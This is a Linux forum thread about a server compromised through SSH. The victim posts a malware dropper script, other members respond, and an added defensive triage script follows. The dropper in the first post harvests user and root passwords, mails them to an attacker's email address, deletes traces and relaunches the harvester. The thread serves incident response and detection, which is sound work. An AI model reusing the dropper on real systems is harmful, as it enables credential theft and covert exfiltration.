Old 06-06-2014, 04:07 PM   #1
T-Dub116
Member
 
Registered: Aug 2013
Location: Dolyestown
Posts: 88

Rep: Reputation: Disabled
SSH Hack - IptabLes & IptabLex


My server was recently attacked by a bot; here is a file it left behind.

#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log > test #This part, the output to test, they were able to uncover all users passwords including "roots"
mkdir /usr/share/misc/
mkdir /usr/share/misc/blah/
cat /usr/share/misc/blah/temp.log |uniq >> test
echo >/usr/share/misc/blah/temp.log
mail deathface2007@yahoo.com -s "$(hostname -f)" < test #Left his email address behind
rm -rf test httpd.log
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A


I was able to lock down ssh in /etc/ssh/sshd_config, and kill off the processes and remove the files from the hacker.

But cron is not working now:

# service crond restart
Stopping crond: [FAILED]
Starting crond: execvp: No such file or directory
[FAILED]

I tried re-loading the rpms but it still will not run. The hacker seems to have done something to kill cron.

Any ideas of what I can do?

Also, is there a way to remove cron altogether so I can reload it from scratch?

Last edited by T-Dub116; 06-06-2014 at 04:10 PM.
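As an added example that is not part of this thread (and not code from any tool mentioned in it), the following POSIX sh script does the first-pass triage a responder would want against the dropper posted above: it looks for the paths the script creates or writes under /usr/lib and /usr/share/misc/blah, for a running popauth process (the dropper starts it as "popauth -w httpd.log"), and for the cron daemon binary, since "Starting crond: execvp: No such file or directory" means the init script could not execute the daemon at all. The ROOT argument (so an offline-mounted disk image can be scanned), the output format and the /usr/sbin/crond path are assumptions made here, not facts from the thread.

```shell
#!/bin/sh
# Added triage helpers for the indicators in the posted dropper script.
# Paths and the process name come from that script; ROOT, the output
# format and /usr/sbin/crond are assumptions made for this example.

# Files and directories the dropper creates or writes to (from the posted script).
IOC_PATHS="/usr/lib/popauth /usr/lib/httpd.log /usr/share/misc/blah /usr/share/misc/blah/temp.log"

# check_ioc_paths ROOT
# Prints "PRESENT: <path>" for each indicator that exists beneath ROOT.
# ROOT is "/" on a live host or the mount point of an offline disk image.
check_ioc_paths() {
    _root=${1%/}
    for _p in $IOC_PATHS; do
        [ -e "$_root$_p" ] && echo "PRESENT: $_root$_p"
    done
    return 0
}

# find_popauth_procs < ps-output
# Reads "ps -eo pid,user,args" output on stdin and prints every line whose
# command (third column, directory prefix stripped) is popauth.
find_popauth_procs() {
    awk '{ cmd = $3; sub(".*/", "", cmd); if (cmd == "popauth") print }'
}

# check_crond_binary ROOT
# Reports whether the daemon the init script tries to exec is present.
# On a live system with rpm available, also asks rpm whether the installed
# files of the package owning the binary still match the package (rpm -Vf).
check_crond_binary() {
    _root=${1%/}
    _bin="$_root/usr/sbin/crond"   # assumed daemon path; use the one your init script runs
    if [ -x "$_bin" ]; then
        echo "crond binary present: $_bin"
        if [ -z "$_root" ] && command -v rpm >/dev/null 2>&1; then
            rpm -Vf "$_bin" || echo "rpm -Vf reports differences for the package owning $_bin"
        fi
    else
        echo "crond binary MISSING: $_bin"
    fi
    return 0
}

# Usage: sh triage.sh ROOT   (for example: sh triage.sh /)
main() {
    root=${1:-/}
    echo "== indicator paths under $root"
    check_ioc_paths "$root"
    echo "== running popauth processes"
    ps -eo pid,user,args | find_popauth_procs
    echo "== cron daemon"
    check_crond_binary "$root"
}

[ $# -gt 0 ] && main "$@" || :
```

Anything this reports is evidence to preserve, not something to clean up and move on from: as the moderator says later in the thread, a dropper installed with root privileges means a root compromise, and the live system's own answers (ps, rpm, the filesystem) can no longer be trusted, so the results belong in the record of the incident while the service is rebuilt on a fresh machine.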
 
Old 06-06-2014, 04:55 PM   #2
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,331
Blog Entries: 55

Rep: Reputation: 3529
Quote:
Originally Posted by T-Dub116
Any ideas of what I can do?
Cut your losses, learn a lesson and install cleanly taking the appropriate precautions.

Do you know what to do or would you like to know more?
 
Old 06-09-2014, 08:00 AM   #3
T-Dub116
Member
 
Registered: Aug 2013
Location: Dolyestown
Posts: 88

Original Poster
Rep: Reputation: Disabled
Quote:
Originally Posted by unSpawn
Cut your losses, learn a lesson and install cleanly taking the appropriate precautions.

Do you know what to do or would you like to know more?


My customer runs his entire business on this server, so I am unable to just "cut my losses and do a clean install".

---------- Post added 06-09-14 at 08:01 AM ----------

Do you have any ideas for me on getting Cron working?
 
Old 06-09-2014, 09:52 AM   #4
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,331
Blog Entries: 55

Rep: Reputation: 3529
Quote:
Originally Posted by T-Dub116
My customer runs his entire business on this server, so I am unable to just "cut my losses and do a clean install".
First of all it took you days to reply. Then you're talking only about combating symptoms in your OP but not the cause. That unfortunately is a good indication of somebody, and I don't know what's the reason, trying to "fix" things (which is supported by your actions like locking down after the fact and re-installing packages). (If you want to see where this is coming from I invite you to search the LQ Linux - Security forum for forensics / incident response clues.)

So. Let me phrase this differently then:

- Installing this malware required root privileges: that means it isn't some isolated breach of security but a root compromise.
- You may not have a clue when the cracker gained root rights, what s/he installed or siphoned off of the machine (passwords, private keys, any data).
- If you value your business you wouldn't cheat your customer into thinking all is well. It isn't. So deal with it.

So. What to do? Inform your users and client(s). Set up a new machine. Don't recycle system data, passwords or private keys. Harden it properly. Adhere to best practices.
Pull any data (to an intermediate system), separate user data and verify everything before migrating it. Don't allow customers to inject stale software or software of questionable origin including plug-ins, add-ons, themes and whatnot. Ensure auditing is enabled. Remain vigilant always. Respond to alerts in a timely fashion.
 
Old 06-10-2014, 10:40 AM   #5
T-Dub116
Member
 
Registered: Aug 2013
Location: Dolyestown
Posts: 88

Original Poster
Rep: Reputation: Disabled
Quote:
Originally Posted by unSpawn
First of all it took you days to reply. Then you're talking only about combating symptoms in your OP but not the cause. That unfortunately is a good indication of somebody, and I don't know what's the reason, trying to "fix" things (which is supported by your actions like locking down after the fact and re-installing packages). (If you want to see where this is coming from I invite you to search the LQ Linux - Security forum for forensics / incident response clues.)

So. Let me phrase this differently then:

- Installing this malware required root privileges: that means it isn't some isolated breach of security but a root compromise.
- You may not have a clue when the cracker gained root rights, what s/he installed or siphoned off of the machine (passwords, private keys, any data).
- If you value your business you wouldn't cheat your customer into thinking all is well. It isn't. So deal with it.

So. What to do? Inform your users and client(s). Set up a new machine. Don't recycle system data, passwords or private keys. Harden it properly. Adhere to best practices.
Pull any data (to an intermediate system), separate user data and verify everything before migrating it. Don't allow customers to inject stale software or software of questionable origin including plug-ins, add-ons, themes and whatnot. Ensure auditing is enabled. Remain vigilant always. Respond to alerts in a timely fashion.


Thanks for trying to help, but I found another online forum that is helping to solve my problem.
 
Old 06-10-2014, 04:16 PM   #6
JeremyBoden
Member
 
Registered: Nov 2011
Posts: 938

Rep: Reputation: 174
I doubt it.
 
Old 06-11-2014, 10:07 PM   #7
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,331
Blog Entries: 55

Rep: Reputation: 3529
Quote:
Originally Posted by T-Dub116
(..) I found another online forum that is helping to solve my problem.
I'm sure you have.


For anyone else: should you want to check, then, due to http://rkhunter.cvs.sourceforge.net/....507&r2=1.508& and http://rkhunter.cvs.sourceforge.net/....1&view=markup, you'd best get Rootkit Hunter from CVS until it is released officially.
 